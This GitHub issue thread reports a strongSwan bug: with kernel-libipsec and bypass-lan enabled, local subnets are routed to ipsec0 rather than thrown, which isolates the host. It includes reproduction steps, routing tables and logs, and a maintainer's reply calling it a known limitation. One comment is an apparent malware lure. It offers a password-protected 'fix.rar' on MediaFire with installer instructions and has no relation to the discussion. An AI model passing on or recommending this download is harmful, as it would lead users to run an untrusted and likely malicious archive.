### ISSUE TITLE
Libipsec does not work with bypass-lan, breaks all local routes

### ISSUE THREAD

**Issue by boisletterink** [strongswan/strongswan#2428]
**System**
 - Debian 12
 - Kernel: `Linux vpntest 6.1.0-23-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.99-1 (2024-07-15) x86_64 GNU/Linux`
 - strongSwan version(s): master branch, commit 12d2b6e. Reports as 5.9.14.
 - Tested/confirmed with the latest version: yes

**Bug Description**
If both kernel-libipsec and bypass-lan are enabled and bypass-lan is configured to actually bypass interfaces, the host will be isolated from the subnets on the interfaces involved; all traffic to those subnets effectively vanishes. With the default settings, this means that the host will be completely isolated from all local subnets. For example, if you're configuring the host over ssh, your ssh session will freeze up.

Note that in this setup, kernel-netlink was used to install the routes; I have not tested any other kernel-net backends. Also, enabling bypass-lan when using kernel-netlink for ESP handling (i.e. without kernel-libipsec) works as advertised.

When the configuration is loaded, strongswan will create routes that send traffic to those subnets to the ipsec0 interface, instead of creating throw routes. I guess a workaround is adding custom routing rules and a custom routing table to bypass the local networks, but I have not tried that yet.

Stopping strongswan will return the routing to normal again, and the networks are accessible again.

**To Reproduce**
Steps to reproduce:
1. Make sure to try this from a non-network console, as your networks will freeze including any existing ssh sessions. Alternatively, configure bypass-lan to use only interfaces that your ssh session is not running on (e.g. `interfaces_use = eth1,eth2`).
2. Make sure you've got a reachable host on the to-be-bypassed network to test reachability. Test this in advance, e.g. `ping 10.0.0.2`.
3. In the strongswan config, enable kernel-libipsec, kernel-netlink and bypass-lan;
4. Use an empty swanctl config - you don't need to actually set up any tunnels. Any other swanctl.conf that normally works should also do, but the empty config keeps things simple;
5. (Re)start strongswan (in my case, that's `systemctl restart strongswan-starter`);
7. Try to reach your test host (in the example of step (2), `ping 10.0.0.2`. In my case, this fails.
8. If you inspect the routing table with  `ip route show table 220`, you will see that the to-be-bypassed subnets are actually routed to the ipsec0 interface.

You can perform the same steps without libipsec enabled, and see that it works as expected. In this case, the bypass routes will be `throw` entries, skipping routing table 220 for traffic to these subnets.

**Expected behavior**
What is expected is that bypass-lan with libipsec actually bypasses the local LANs, instead of completely sinkholing traffic to them.

**Logs/Backtraces**
***Working Setup***
Without libipsec and with bypass-lan, `ip -d route show table 220` shows something like this:

> throw 10.0.0.0/24 proto static scope global
> throw 192.168.1.0/24 proto static scope global
> unicast 192.168.2.0/24 via 10.0.0.2 dev eth1 proto static scope global src 192.168.1.1

(The last entry is a route for a configured connection, as an example.)

The logs look like this:

> 2024-08-27 12:16:52.684 06[KNL] adding policy 10.0.0.0/24 === 10.0.0.0/24 out [priority 175423, refcount 1]
> 2024-08-27 12:16:52.684 06[KNL] getting a local address in traffic selector 10.0.0.0/24
> 2024-08-27 12:16:52.684 06[KNL] using host 10.0.0.1
> 2024-08-27 12:16:52.684 06[KNL] getting iface name for index 5
> 2024-08-27 12:16:52.684 06[KNL] no nexthop found to reach 10.0.0.0/24
> 2024-08-27 12:16:52.684 06[KNL] installing route: 10.0.0.0/24 via (null) src 10.0.0.1 dev eth1
> 2024-08-27 12:16:52.684 06[KNL] adding policy 10.0.0.0/24 === 10.0.0.0/24 in [priority 175423, refcount 1]
> 2024-08-27 12:16:52.684 06[KNL] adding policy 10.0.0.0/24 === 10.0.0.0/24 fwd [priority 175423, refcount 1]
> 2024-08-27 12:16:52.684 06[IKE] installed bypass policy for 10.0.0.0/24
> 2024-08-27 12:16:52.684 06[KNL] adding policy 192.168.1.0/24 === 192.168.1.0/24 out [priority 175423, refcount 1]
> 2024-08-27 12:16:52.684 06[KNL] getting a local address in traffic selector 192.168.1.0/24
> 2024-08-27 12:16:52.684 06[KNL] using host 192.168.1.1
> 2024-08-27 12:16:52.684 06[KNL] no nexthop found to reach 192.168.1.0/24
> 2024-08-27 12:16:52.684 06[KNL] installing route: 192.168.1.0/24 via (null) src 192.168.1.1 dev (null)
> 2024-08-27 12:16:52.684 06[KNL] adding policy 192.168.1.0/24 === 192.168.1.0/24 in [priority 175423, refcount 1]
> 2024-08-27 12:16:52.684 06[KNL] adding policy 192.168.1.0/24 === 192.168.1.0/24 fwd [priority 175423, refcount 1]
> 2024-08-27 12:16:52.684 06[IKE] installed bypass policy for 192.168.1.0/24

***Broken Setup***
With libipsec and with bypass-lan, `ip -d route show table 220` shows something like this:

> unicast 10.0.0.0/24 dev ipsec0 proto static scope global src 10.0.0.1
> unicast 192.168.1.0/24 dev ipsec0 proto static scope global src 192.168.1.1
> unicast 192.168.2.0/24 via 10.0.0.2 dev eth1 proto static scope global src 192.168.1.1

The logs contain no errors but confirm the issue:

> 2024-08-27 12:05:25.204 09[KNL] getting a local address in traffic selector 10.0.0.0/24
> 2024-08-27 12:05:25.204 09[KNL] using host 10.0.0.1
> 2024-08-27 12:05:25.204 09[KNL] installing route: 10.0.0.0/24 src 10.0.0.1 dev ipsec0
> 2024-08-27 12:05:25.204 09[KNL] getting iface index for ipsec0
> 2024-08-27 12:05:25.204 09[IKE] installed bypass policy for 10.0.0.0/24
> 2024-08-27 12:05:25.204 09[KNL] getting a local address in traffic selector 192.168.1.0/24
> 2024-08-27 12:05:25.204 09[KNL] using host 192.168.1.1
> 2024-08-27 12:05:25.204 09[KNL] installing route: 192.168.1.0/24 src 192.168.1.1 dev ipsec0
> 2024-08-27 12:05:25.204 09[KNL] getting iface index for ipsec0
> 2024-08-27 12:05:25.204 09[IKE] installed bypass policy for 192.168.1.0/24

**Comment by yldzmuhammed** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by tobiasbrunner** [comment]
Yes, this is a known limitation (bypass policies not being supported by (kernel-)libipsec). It's not so much that libipsec would need changes as that traffic should never pass through it. More likely it's something that could be added to _kernel-libipsec_ (e.g. so that throw routes are installed as well, although, that will only work on Linux). This won't have much priority at the moment.
